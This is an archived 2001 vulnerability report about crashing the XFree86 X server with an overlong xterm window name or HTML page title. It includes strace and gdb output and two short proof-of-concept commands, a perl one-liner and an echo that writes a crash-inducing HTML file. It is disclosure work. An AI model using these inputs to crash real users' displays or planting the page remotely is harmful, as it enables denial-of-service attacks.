XFree86 DOS / Buffer overflow local and remote.

2001-09-24T00:00:00
ID SECURITYVULNS:DOC:2049
Type securityvulns
Reporter Securityvulns
Modified 2001-09-24T00:00:00

Description

While playing with the WindowMaker title overflow I noticed the following...I have tested this while running KDE and while running plain vanilla xwindows with no window manager. The first time I was in WindowMaker and of course it segfaulted also. This seems to work on Mandrake 8.0 ppc but not on my Mandrake 7.2 i586.

I was trying to exploit the WindowMaker overflow using xterm -name <long string here>. Instead I ended up crashing X all together.

This is the end of an strace of the WindowMaker wmaker executable with the PID of 2003 upeek: ptrace(PTRACE_PEEKUSER, ... ): No such process AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAA: fatal IO error 32 (Broken pipe) or KillClient on X server "localhost:0.0" [1]+ Done strace -o wmaker.strace -ivfp 2003

Heres the end of the message dumped to my screen when I typed startx from my bash prompt.

() Mouse1: Core Pointer (==) Mouse1: Buttons: 3 () Mouse1: Emulate3Buttons, Emulate3Timeout: 50 (II) Keyboard "Keyboard1" handled by legacy driver (II) XINPUT: Adding extended input device "Mouse1" (type: MOUSE)

Fatal server error: Caught signal 11. Server aborting

When reporting a problem related to a server crash, please send the full server output, not just the last messages. This can be found in the log file "/var/log/XFree86.0.log". Please report problems to xfree86@xfree86.org.

xinit: connection to X server lost.

The first few lines of the core file lead me to believe I was crashing X rather than wmaker.

strings core CORE CORE /etc/X11/X :0 -auth /root/.Xauthority -deferglyphs 16

I ran gdb on the xterm program to make sure I wasnt overflowing the xterm -name paramater.

(gdb) run -display localhost:0 -name `perl -e 'print "A" x 9000'` Starting program: /usr/X11R6/bin/xterm -display localhost:0 -name `perl -e 'print "A" x 9000'` (no debugging symbols found)...(no debugging symbols found)...(no debugging symbols found)...(no debugging symbols found)... (no debugging symbols found)...(no debugging symbols found)...(no debugging symbols found)...(no debugging symbols found)... (no debugging symbols found)...(no debugging symbols found)...(no debugging symbols found)...(no debugging symbols found)... (no debugging symbols found)...(no debugging symbols found)... Program exited normally.

As you can see it exited as normal. From the strace below we can see the /etc/X11/X segment faults for some reason.

2760 [0fe987d8] read(14, "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"..., 6316) = 6316 2760 [0fe987d8] read(14, "8A\0\4\0\340\0\273\0\10\0\0\0\0\0\0008A\0\4\0\340\0\340"..., 9088) = 2064 2760 [0fe71514] gettimeofday({1001226845, 554528}, NULL) = 0 2760 [0fe71514] gettimeofday({1001226845, 556127}, NULL) = 0 2760 [10162b24] --- SIGSEGV (Segmentation fault) --- 2760 [0fe091b0] rt_sigaction(SIGSEGV, {SIG_IGN}, {0x1003d664, [SEGV], SA_RESTART}, 8) = 0 2760 [0fe091b0] --- SIGALRM (Alarm clock) --- 2760 [0fe987e8] write(2, "\nFatal server error:\n", 21) = 21 2760 [0fe987e8] write(0, "\nFatal server error:\n", 21) = 21 2760 [0fe987e8] write(2, "Caught signal 11. Server aborti"..., 35) = 35 2760 [0fe987e8] write(0, "Caught signal 11. Server aborti"..., 35) = 35 2760 [0fe987e8] write(2, "\n", 1) = 1 2760 [0fe987e8] write(0, "\n", 1) = 1 2760 [0fe987e8] write(2, "\nWhen reporting a problem relate"..., 117) = 117 2760 [0fe987e8] write(0, "\nWhen reporting a problem relate"..., 117) = 117 2760 [0fe987e8] write(2, "This can be found in the log fil"..., 60) = 60 2760 [0fe987e8] write(0, "This can be found in the log fil"..., 60) = 60 2760 [0fe987e8] write(2, "Please report problems to xfree8"..., 47) = 47 2760 [0fe987e8] write(0, "Please report problems to xfree8"..., 47) = 47 2760 [0fe987e8] write(2, "\n", 1) = 1 2760 [0fe987e8] write(0, "\n", 1) = 1 2760 [0fe9a008] unlink("/tmp/.X0-lock") = 0

The following seemed to do the trick when viewed with netscape... I had to click the x in the corner of the window to exit netscape before it crashed...either that or it just took a sec.

echo "<HEAD><TITLE>"`perl -e 'print "A" x 9000'`"</HEAD></TITLE>" > file.html

since you can put this html on any web page I suppose that makes this issue remote also.

-KF